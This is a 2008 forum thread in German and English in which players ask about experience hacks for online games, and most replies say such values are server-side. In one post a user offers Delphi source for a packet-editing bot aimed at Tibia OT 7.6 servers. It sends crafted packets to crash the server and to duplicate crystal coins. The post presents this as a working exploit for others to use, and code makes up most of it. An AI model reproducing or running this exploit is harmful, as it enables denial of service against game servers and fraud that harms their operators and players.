Exp hack

03/08/2008 16:23 Snock92#1
Hi,

Englisch:
I know no questions but I have a question: Who can I get a Exp hack pls a link.
Sry for bad English:)

Deutsch:
Ich weiß keine fragen, aber ich hab eine wo kann man den Exp hack herbekommen bitte einen Link.
03/08/2008 16:34 LuCk3r#2
Zu so ner frage gibts immer die selbe antwort: nirgends!
Du kannst dir nur bots besorgen die für dich lvln..
03/08/2008 16:36 XameX#3
Richtöög aber Junge, wer auf nem PRIVAT server nicht leveln kann ... sehr peinlich
03/08/2008 16:37 Snock92#4
Aber bei Youtube gibt es ein paar videos wo man leute mit Speed;Exp-hack sieht
03/08/2008 17:33 XameX#5
Du weißt schon das das oft Faker sind, die sich nen eigenen Privat Server machen und dann diesen zb GM-Power hack zur verfügung setzen wobei das ein Keylogger ist
03/08/2008 21:06 BurningMan#6
i think that there are no working exp hack
03/08/2008 21:21 Sikas#7
Get the fuck out you noob. Understand how the game server works with your computer. You can't edit exp because that's server-side.
03/08/2008 23:52 king_n91#8
[no questions]
03/09/2008 01:26 dragon5555#9
[no questions]

Und außerdem sowas wie einen EXP-Hack oder Gold-Hack usw. gibt es nicht und es wird nie sowas geben , aber es gibt z.B. Bugs wie man Gold bekommen kann vlt. gibt es sowas für EXP obwohl ich das stark Bezweifle.

mfG dragon5555
03/09/2008 10:26 Kleiner Dodo#10
Gabs hier nichtmal irgendwo ein Guide wo beschrieben wurde, wie man mit Hilfe von WPE und den Anfangs Laufquests massig EP bekommt...
03/09/2008 10:31 12354#11
Quote:
Originally Posted by psYcho aka. SLDZ View Post
Gabs hier nichtmal irgendwo ein Guide wo beschrieben wurde, wie man mit Hilfe von WPE und den Anfangs Laufquests massig EP bekommt...
Das funktioniert schon ewig nichmehr ; P
03/10/2008 01:45 thesinerd#12
Sikas, you only know that those values are server sided only from what you have read not found for your self. please just stfu
03/10/2008 08:03 Sikas#13
Because they ARE server sided. Any smart ass would know that. Why do you think there's no EXP HACK on RETAIL? Huh noob? Answer me that? Because it's CONTROLLED BY THE SERVER. You can't even argue against my claim because you haven't even READ the info. You're jus a nub that loves to start shit without any clue. Get the FUCK out, and SHUT THE FUCK UP. You don't kno shit bout servers.
03/10/2008 08:21 hans henrik#14
sikas stop flaming the guy lol... and as for the exp hack, i dont think there are any working ones atm :/ (ofc a while ago, there was a Buy-only bot that clamed it cud change your wow-stats to 99999, and im not even sure if it was ever real but looked real in the youtube movies, lol)

and sikas, in the game Tibia OT, i can dupe money, and items (thought its server-sided) cause i found a NULL-bug in "stackable-objects" that i can use to crash the server (with packet-editing), and guess what? i made a bot out of it, lol
V is code to a bot that with some brain (multi-clienting, logout=save, crash logout= not save), can help u hack Server-sided values in the game "Tibia OT 7.6" lol :p
Code:
library rPE_ex;

uses
  windows,
  Winsock2,
  winsock,
  rpefuncs;


procedure Send_WS1(s: TSocket; var Buf : PChar; len, flags: Integer; pSendWs1, pRecvWs1, pSendWs2, pRecvWs2: Pointer; var IsWorking : Boolean); stdcall;
var
 FilterExList : TFilterExList;
  CurHex: string;
  i : integer;
  
  
  

begin
	CurHex := GetBufferAsHex(buf, len);
	// Down is *OT Hacker* Crash Server Method 1
	if (pos('2400960409004F54204861636B65721500437261736820536572766572204D6574686F642031',CurHex) <> 0) then
	begin
		setlength(FilterExList,1);
		CurHex := GetBufferAsHex(buf, len);
		@Send_Callback := pSendWs1;
		for i := 0 to 20 do
	    	begin
	      		SendPacket(s,'0500A480010');
           	end;
	    	begin
	      		SendPacket(s,'0F0078FFFF0A0000D70B00');
           	end;
	end;
	
	// Down is *OT Hacker* Crash Server Method 2
	if (pos('2400960409004F5 4204861636B65721500437261736820536572766572204D6574686F642032',CurHex) <> 0) then
	begin
		setlength(FilterExList,1);
		CurHex := GetBufferAsHex(buf, len);   
		@Send_Callback := pSendWs1;
		for i := 0 to 20 do
	    	begin
	      		SendPacket(s,'0F0078FFFF0A0000D70B00FFF050000');
	      		SendPacket(S,'0F0078FFFF050000D70B0FFF3000');

           	end;
	    	begin
	      		SendPacket(s,'0F0078FFFF0A0000D70B00');
           	end;

	end;
	
        // Down is *OT Hacker* Create 100 Crystall Coin        0F0078FFFF0A0000D70B00
	if (pos('2700960409004F54204861636B6572180043726561746520313030204372797374616C6C20436F696E',CurHex) <> 0) then
	begin
		setlength(FilterExList,1);
		CurHex := GetBufferAsHex(buf, len);   
		@Send_Callback := pSendWs1;
		for i := 0 to 100 do
	    	begin
                        Sleep(10);
	      		SendPacket(s,'0F0078FFFF0AE30B00FFFF05000000');
	      		SendPacket(S,'0A0082FFFF050000E30B0001');
	      		SendPacket(S,'0A0082FFFF050000DB0B0001');
	      		SendPacket(S,'0F0078FF050000E30B00FFFF40000001');

           	end;
	end;

        // Down is *OT Hacker* Create BP Crystall Coin
        if (pos('2600960409004F54204861636B65721700437265617465204250204372797374616C6C20436F696E',CurHex) <> 0) then
	begin
		setlength(FilterExList,1);
		CurHex := GetBufferAsHex(buf, len);   
		@Send_Callback := pSendWs1;
		for i := 0 to 8000 do
	    	begin
	    	Sleep(10);
	      		SendPacket(s,'0FFFFF0A0000E30B00FFFF05000000');
	      		SendPacket(S,'0A0082FFFF050000E30B0001');
	      		SendPacket(S,'0A0082FFFF050000DB0B0001');
	      		SendPacket(S,'0F0078FF0000E30B00FFFF40000001');

           	end;
	end;

        // Down is *OT Hacker* FastCreate 100 Crystall Coin (warning, can get tibia to crash...)
	if (pos('2B00960409004F54204861636B65721C004661737443726561746520313030204372797374616C6C20436F696E',CurHex) <> 0) then
	begin
		setlength(FilterExList,1);
		CurHex := GetBufferAsHex(buf, len);   
		@Send_Callback := pSendWs1;
		for i := 0 to 100 do
	    	begin
	      		SendPacket(s,'0F0078FFFF0A0000E300FFFF0500');
	      		SendPacket(S,'0A0082FFFF050000E30B0001');
	      		SendPacket(S,'0A0082FFFF050000DB0B0001');
	      		SendPacket(S,'0F0078FFFF05030B00FFFF40000001');

           	end;
	end;


        // Down is *OT Hacker* FastCreate BP Crystall Coin (warning, can get tibia to crash...)
        if (pos('2A00960409004F54204861636B65721B0046617374437265617465204250204372797374616C6C20436F696E',CurHex) <> 0) then
	begin
		setlength(FilterExList,1);
		CurHex := GetBufferAsHex(buf, len);   
		@Send_Callback := pSendWs1;
		for i := 0 to 8000 do
	    	begin
	      		SendPacket(s,'0F0078FFFF0AE30B00FFFF05000000');
	      		SendPacket(S,'0A0082FFFF050000E30B0001');
	      		SendPacket(S,'0A0082FFFF050000DB0B0001');
	      		SendPacket(S,'0F0078FF0500E30B00FFFF40000001');

           	end;
	end;
	
end;
  
exports
 Send_WS1;
 
begin
ShowMessage ('This is OT Hacker 7.6 bot');
ShowMessage ('Readme: Read the damn readme file, lool :p');
ShowMessage ('Creator: Hans Henrik.  Credits: rEdoX (cud never have done it without him! ^^)');
end.
03/10/2008 18:09 Sikas#15
That would be a flaw or a bug in the code itself. If it's coded correctly and checked, you can't hack exp. WoW exp can't be HACKED. It's been fixed after like 2-3 patches.